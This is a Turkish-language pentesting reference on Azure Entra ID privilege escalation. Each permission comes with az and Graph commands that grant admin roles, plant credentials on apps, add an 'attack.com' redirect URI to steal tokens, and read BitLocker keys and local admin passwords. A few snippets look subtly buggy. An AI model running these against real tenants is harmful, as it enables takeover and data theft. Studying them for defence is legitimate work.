Az - EntraID Privesc

Roller

Rol: Ayrıcalıklı Rol Yöneticisi

Bu rol, ilkeler için roller atamak ve rollere daha fazla izin vermek için gerekli ayrıntılı izinleri içerir. Her iki eylem de ayrıcalıkları artırmak için kötüye kullanılabilir.

• Bir kullanıcıya rol atayın:

# List enabled built-in roles
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directoryRoles"

# Give role (Global Administrator?) to a user
roleId="<roleId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/directoryRoles/$roleId/members/\$ref" \
--headers "Content-Type=application/json" \
--body "{
\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"
}"

• Bir role daha fazla izin ekleyin:

# List only custom roles
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions" | jq '.value[] | select(.isBuiltIn == false)'

# Change the permissions of a custom role
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions/<role-id>" \
--headers "Content-Type=application/json" \
--body '{
"description": "Update basic properties of application registrations",
"rolePermissions": [
{
"allowedResourceActions": [
"microsoft.directory/applications/credentials/update"
]
}
]
}'

Uygulamalar

microsoft.directory/applications/credentials/update

Bu, bir saldırgana mevcut uygulamalara kimlik bilgileri (şifreler veya sertifikalar) ekleme imkanı tanır. Uygulama ayrıcalıklı izinlere sahipse, saldırgan o uygulama olarak kimlik doğrulaması yapabilir ve bu ayrıcalıkları elde edebilir.

# Generate a new password without overwritting old ones
az ad app credential reset --id <appId> --append
# Generate a new certificate without overwritting old ones
az ad app credential reset --id <appId> --create-cert

microsoft.directory/applications.myOrganization/credentials/update

Bu, applications/credentials/update ile aynı eylemleri sağlar, ancak tek dizin uygulamaları için kapsamlıdır.

az ad app credential reset --id <appId> --append

microsoft.directory/applications/owners/update

Kendilerini bir sahip olarak ekleyerek, bir saldırgan uygulamayı, kimlik bilgileri ve izinler dahil olmak üzere manipüle edebilir.

az ad app owner add --id <AppId> --owner-object-id <UserId>
az ad app credential reset --id <appId> --append

# You can check the owners with
az ad app owner list --id <appId>

microsoft.directory/applications/allProperties/update

Bir saldırgan, kiracının kullanıcıları tarafından kullanılan uygulamalara bir yönlendirme URI'si ekleyebilir ve ardından bu yeni yönlendirme URL'sini kullanan oturum açma URL'lerini onlarla paylaşarak token'larını çalabilir. Kullanıcının zaten uygulamada oturum açmış olması durumunda, kimlik doğrulama otomatik olacak ve kullanıcının herhangi bir şeyi kabul etmesine gerek kalmayacaktır.

Ayrıca, uygulamanın talep ettiği izinleri değiştirerek daha fazla izin almak da mümkündür, ancak bu durumda kullanıcının tüm izinleri isteyen istemi tekrar kabul etmesi gerekecektir.

# Get current redirect uris
az ad app show --id ea693289-78f3-40c6-b775-feabd8bef32f --query "web.redirectUris"
# Add a new redirect URI (make sure to keep the configured ones)
az ad app update --id <app-id> --web-redirect-uris "https://original.com/callback https://attack.com/callback"

Hizmet Temsilcileri

microsoft.directory/servicePrincipals/credentials/update

Bu, bir saldırganın mevcut hizmet temsilcilerine kimlik bilgileri eklemesine olanak tanır. Eğer hizmet temsilcisi yükseltilmiş ayrıcalıklara sahipse, saldırgan bu ayrıcalıkları üstlenebilir.

az ad sp credential reset --id <sp-id> --append

Eğer "code":"CannotUpdateLockedServicePrincipalProperty","message":"Property passwordCredentials is invalid." hatasını alıyorsanız, bunun nedeni SP'nin passwordCredentials özelliğini değiştirmenin mümkün olmamasıdır ve önce onu kilidini açmanız gerekir. Bunun için, şunu çalıştırmanıza izin veren bir izne ihtiyacınız var (microsoft.directory/applications/allProperties/update):

az rest --method PATCH --url https://graph.microsoft.com/v1.0/applications/<sp-object-id> --body '{"servicePrincipalLockConfiguration": null}'

microsoft.directory/servicePrincipals/synchronizationCredentials/manage

Bu, bir saldırganın mevcut hizmet ilkelerine kimlik bilgileri eklemesine olanak tanır. Eğer hizmet ilkesi yükseltilmiş ayrıcalıklara sahipse, saldırgan bu ayrıcalıkları üstlenebilir.

az ad sp credential reset --id <sp-id> --append

microsoft.directory/servicePrincipals/owners/update

Uygulamalara benzer şekilde, bu izin bir hizmet ilkesine daha fazla sahip eklemeye olanak tanır. Bir hizmet ilkesine sahip olmak, onun kimlik bilgileri ve izinleri üzerinde kontrol sağlar.

# Add new owner
spId="<spId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$spId/owners/\$ref" \
--headers "Content-Type=application/json" \
--body "{
\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"
}"

az ad sp credential reset --id <sp-id> --append

# You can check the owners with
az ad sp owner list --id <spId>

microsoft.directory/servicePrincipals/disable ve enable

Bu izinler, hizmet ilkelerini devre dışı bırakma ve etkinleştirme olanağı sağlar. Bir saldırgan, ayrıcalıkları artırmak için erişim sağlayabileceği bir hizmet ilkesini etkinleştirmek için bu izni kullanabilir.

Bu teknik için saldırganın etkinleştirilen hizmet ilkesini ele geçirmek için daha fazla izne ihtiyacı olacağını unutmayın.

bashCopy code# Disable
az ad sp update --id <ServicePrincipalId> --account-enabled false

# Enable
az ad sp update --id <ServicePrincipalId> --account-enabled true

microsoft.directory/servicePrincipals/getPasswordSingleSignOnCredentials & microsoft.directory/servicePrincipals/managePasswordSingleSignOnCredentials

Bu izinler, üçüncü taraf uygulamalara erişim sağlayabilecek tek oturum açma için kimlik bilgileri oluşturma ve alma yetkisi verir.

# Generate SSO creds for a user or a group
spID="<spId>"
user_or_group_id="<id>"
username="<username>"
password="<password>"
az rest --method POST \
--uri "https://graph.microsoft.com/beta/servicePrincipals/$spID/createPasswordSingleSignOnCredentials" \
--headers "Content-Type=application/json" \
--body "{\"id\": \"$user_or_group_id\", \"credentials\": [{\"fieldId\": \"param_username\", \"value\": \"$username\", \"type\": \"username\"}, {\"fieldId\": \"param_password\", \"value\": \"$password\", \"type\": \"password\"}]}"


# Get credentials of a specific credID
credID="<credID>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$credID/getPasswordSingleSignOnCredentials" \
--headers "Content-Type=application/json" \
--body "{\"id\": \"$credID\"}"

Gruplar

microsoft.directory/groups/allProperties/update

Bu izin, kullanıcıları ayrıcalıklı gruplara eklemeye olanak tanır ve bu da ayrıcalık yükselmesine yol açar.

az ad group member add --group <GroupName> --member-id <UserId>

Not: Bu izin, Entra ID rol atama gruplarını hariç tutar.

microsoft.directory/groups/owners/update

Bu izin, grupların sahibi olmayı sağlar. Bir grubun sahibi, grup üyeliğini ve ayarlarını kontrol edebilir, bu da potansiyel olarak grubun ayrıcalıklarını artırabilir.

az ad group owner add --group <GroupName> --owner-object-id <UserId>
az ad group member add --group <GroupName> --member-id <UserId>

Not: Bu izin, Entra ID rol atanabilir gruplarını hariç tutar.

microsoft.directory/groups/members/update

Bu izin, bir gruba üye eklemeye olanak tanır. Bir saldırgan, kendisini veya kötü niyetli hesapları ayrıcalıklı gruplara ekleyerek yükseltilmiş erişim sağlayabilir.

az ad group member add --group <GroupName> --member-id <UserId>

microsoft.directory/groups/dynamicMembershipRule/update

Bu izin, dinamik bir gruptaki üyelik kuralını güncellemeye olanak tanır. Bir saldırgan, kendisini ayrı bir ekleme olmadan ayrıcalıklı gruplara dahil etmek için dinamik kuralları değiştirebilir.

groupId="<group-id>"
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/groups/$groupId" \
--headers "Content-Type=application/json" \
--body '{
"membershipRule": "(user.otherMails -any (_ -contains \"security\")) -and (user.userType -eq \"guest\")",
"membershipRuleProcessingState": "On"
}'

Not: Bu izin, Entra ID rol atanabilir gruplarını hariç tutar.

Dinamik Gruplar Privesc

Kullanıcıların, dinamik gruplara üye olarak eklenmek için kendi özelliklerini değiştirerek yetkilerini artırmaları mümkün olabilir. Daha fazla bilgi için kontrol edin:

Kullanıcılar

microsoft.directory/users/password/update

Bu izin, yönetici olmayan kullanıcılara şifre sıfırlama izni verir ve potansiyel bir saldırganın diğer kullanıcılara yetki artırmasına olanak tanır. Bu izin özel rollere atanamaz.

az ad user update --id <user-id> --password "kweoifuh.234"

microsoft.directory/users/basic/update

Bu ayrıcalık, kullanıcının özelliklerini değiştirmeye izin verir. Özellik değerlerine dayalı olarak kullanıcı ekleyen dinamik gruplar bulmak yaygındır, bu nedenle bu izin, bir kullanıcının belirli bir dinamik grup üyesi olmak için gerekli özellik değerini ayarlamasına ve ayrıcalıkları artırmasına olanak tanıyabilir.

#e.g. change manager of a user
victimUser="<userID>"
managerUser="<userID>"
az rest --method PUT \
--uri "https://graph.microsoft.com/v1.0/users/$managerUser/manager/\$ref" \
--headers "Content-Type=application/json" \
--body '{"@odata.id": "https://graph.microsoft.com/v1.0/users/$managerUser"}'

#e.g. change department of a user
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/users/$victimUser" \
--headers "Content-Type=application/json" \
--body "{\"department\": \"security\"}"

Koşullu Erişim Politikaları ve MFA atlatma

Yanlış yapılandırılmış MFA gerektiren koşullu erişim politikaları atlatılabilir, kontrol edin:

Cihazlar

microsoft.directory/devices/registeredOwners/update

Bu izin, saldırganların cihazların sahiplerini kendilerine atayarak cihazlara özgü ayar ve verilere erişim veya kontrol sağlamalarına olanak tanır.

deviceId="<deviceId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/devices/$deviceId/owners/\$ref" \
--headers "Content-Type=application/json" \
--body '{"@odata.id": "https://graph.microsoft.com/v1.0/directoryObjects/$userId"}'

microsoft.directory/devices/registeredUsers/update

Bu izin, saldırganların hesaplarını cihazlarla ilişkilendirmesine olanak tanır, böylece erişim elde edebilir veya güvenlik politikalarını atlayabilirler.

deviceId="<deviceId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/devices/$deviceId/registeredUsers/\$ref" \
--headers "Content-Type=application/json" \
--body '{"@odata.id": "https://graph.microsoft.com/v1.0/directoryObjects/$userId"}'

microsoft.directory/deviceLocalCredentials/password/read

Bu izin, saldırganların Microsoft Entra'ya katılmış cihazlar için yedeklenmiş yerel yönetici hesap kimlik bilgilerini, şifre de dahil olmak üzere, okumalarına olanak tanır.

# List deviceLocalCredentials
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials"

# Get credentials
deviceLC="<deviceLCID>"
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials/$deviceLCID?\$select=credentials" \

BitlockerAnahtarları

microsoft.directory/bitlockerKeys/key/read

Bu izin, BitLocker anahtarlarına erişim sağlar; bu da bir saldırganın sürücüleri şifrelerini çözmesine ve veri gizliliğini tehlikeye atmasına olanak tanıyabilir.

# List recovery keys
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys"

# Get key
recoveryKeyId="<recoveryKeyId>"
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys/$recoveryKeyId?\$select=key"

Diğer İlginç İzinler (TODO)

• microsoft.directory/applications/permissions/update

• microsoft.directory/servicePrincipals/permissions/update

• microsoft.directory/applications.myOrganization/allProperties/update

• microsoft.directory/applications/allProperties/update

• microsoft.directory/servicePrincipals/appRoleAssignedTo/update

• microsoft.directory/applications/appRoles/update

• microsoft.directory/applications.myOrganization/permissions/update